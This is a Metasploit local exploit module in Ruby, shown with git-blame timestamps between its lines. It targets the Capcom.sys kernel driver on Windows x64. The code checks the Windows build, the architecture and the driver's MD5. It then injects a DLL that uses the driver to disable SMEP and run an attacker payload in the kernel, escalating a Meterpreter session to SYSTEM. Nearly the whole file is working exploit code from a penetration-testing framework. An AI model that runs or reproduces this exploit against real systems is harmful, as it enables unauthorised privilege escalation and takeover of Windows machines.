2016-09-27 22:37:45 +10:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2016-09-27 22:37:45 +10:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Local
|
|
|
|
|
Rank = NormalRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
|
include Msf::Post::Windows::Priv
|
|
|
|
|
include Msf::Post::Windows::Process
|
|
|
|
|
include Msf::Post::Windows::ReflectiveDLLInjection
|
2023-09-08 13:05:44 -04:00
|
|
|
prepend Msf::Exploit::Remote::AutoCheck
|
2016-09-27 22:37:45 +10:00
|
|
|
|
2021-09-10 12:53:39 +01:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(
|
|
|
|
|
update_info(
|
|
|
|
|
info,
|
|
|
|
|
{
|
|
|
|
|
'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module abuses the Capcom.sys kernel driver's function that allows for an
|
|
|
|
|
arbitrary function to be executed in the kernel from user land. This function
|
|
|
|
|
purposely disables SMEP prior to invoking a function given by the caller.
|
2023-01-13 19:00:51 +05:30
|
|
|
This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.
|
2023-06-30 16:13:59 -05:00
|
|
|
Note that builds after 22000.194 contain deny lists that prevent this driver from loading.
|
2021-09-10 12:53:39 +01:00
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' => [
|
|
|
|
|
'TheWack0lian', # Issue discovery
|
|
|
|
|
'OJ Reeves' # exploit and msf module
|
|
|
|
|
],
|
|
|
|
|
'Arch' => [ARCH_X64],
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
|
'DefaultOptions' => {
|
2023-05-25 12:45:30 +10:00
|
|
|
'EXITFUNC' => 'thread'
|
2021-09-10 12:53:39 +01:00
|
|
|
},
|
|
|
|
|
'Targets' => [
|
2023-06-30 16:13:59 -05:00
|
|
|
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
|
2021-09-10 12:53:39 +01:00
|
|
|
],
|
|
|
|
|
'Payload' => {
|
|
|
|
|
'Space' => 4096,
|
|
|
|
|
'DisableNops' => true
|
|
|
|
|
},
|
|
|
|
|
'References' => [
|
|
|
|
|
['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']
|
|
|
|
|
],
|
|
|
|
|
'DisclosureDate' => '1999-01-01', # non-vuln exploit date
|
2021-10-06 13:43:31 +01:00
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'Compat' => {
|
|
|
|
|
'Meterpreter' => {
|
|
|
|
|
'Commands' => %w[
|
|
|
|
|
stdapi_fs_md5
|
|
|
|
|
stdapi_sys_config_driver_list
|
|
|
|
|
]
|
|
|
|
|
}
|
|
|
|
|
}
|
2021-09-10 12:53:39 +01:00
|
|
|
}
|
|
|
|
|
)
|
|
|
|
|
)
|
2016-09-27 22:37:45 +10:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def check
|
2023-01-13 19:00:51 +05:30
|
|
|
return Exploit::CheckCode::Unknown unless session.platform == 'windows'
|
|
|
|
|
|
2023-05-25 12:45:30 +10:00
|
|
|
version = get_version_info
|
|
|
|
|
if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?
|
2016-09-27 22:37:45 +10:00
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
|
end
|
|
|
|
|
|
2023-06-30 16:24:28 -05:00
|
|
|
# These versions of Windows 11 come built in with a driver block list preventing loading of capcom.sys
|
|
|
|
|
if version.build_number > Rex::Version.new('10.0.22000.194')
|
|
|
|
|
return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')
|
|
|
|
|
end
|
|
|
|
|
|
2021-02-22 18:47:46 -06:00
|
|
|
if sysinfo['Architecture'] != ARCH_X64
|
2016-09-27 22:37:45 +10:00
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
|
end
|
|
|
|
|
|
2016-10-04 11:17:52 +10:00
|
|
|
# Validate that the driver has been loaded and that
|
|
|
|
|
# the version is the same as the one expected
|
|
|
|
|
client.sys.config.getdrivers.each do |d|
|
2023-05-25 12:45:30 +10:00
|
|
|
next unless d[:basename].downcase == 'capcom.sys'
|
2016-09-27 22:37:45 +10:00
|
|
|
|
2023-05-25 12:45:30 +10:00
|
|
|
expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'
|
|
|
|
|
target_checksum = client.fs.file.md5(d[:filename])
|
|
|
|
|
|
|
|
|
|
if expected_checksum == Rex::Text.to_hex(target_checksum, '')
|
|
|
|
|
return Exploit::CheckCode::Appears
|
2016-10-04 11:17:52 +10:00
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
return Exploit::CheckCode::Safe
|
2016-09-27 22:37:45 +10:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
if is_system?
|
|
|
|
|
fail_with(Failure::None, 'Session is already elevated')
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
check_result = check
|
|
|
|
|
if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
|
|
|
|
|
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
|
|
|
|
|
end
|
|
|
|
|
|
2016-10-29 08:11:20 +10:00
|
|
|
if sysinfo['Architecture'] == ARCH_X64
|
|
|
|
|
if session.arch == ARCH_X86
|
|
|
|
|
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
if target.arch.first == ARCH_X86
|
|
|
|
|
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
|
|
|
|
end
|
2016-09-27 22:37:45 +10:00
|
|
|
end
|
|
|
|
|
|
2021-07-01 11:58:13 -05:00
|
|
|
encoded_payload = payload.encoded
|
|
|
|
|
execute_dll(
|
|
|
|
|
::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec', 'capcom_sys_exec.x64.dll'),
|
2021-07-21 12:35:47 -05:00
|
|
|
encoded_payload
|
2021-07-01 11:58:13 -05:00
|
|
|
)
|
2016-09-27 22:37:45 +10:00
|
|
|
|
|
|
|
|
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
|
|
|
|
end
|
|
|
|
|
end
|
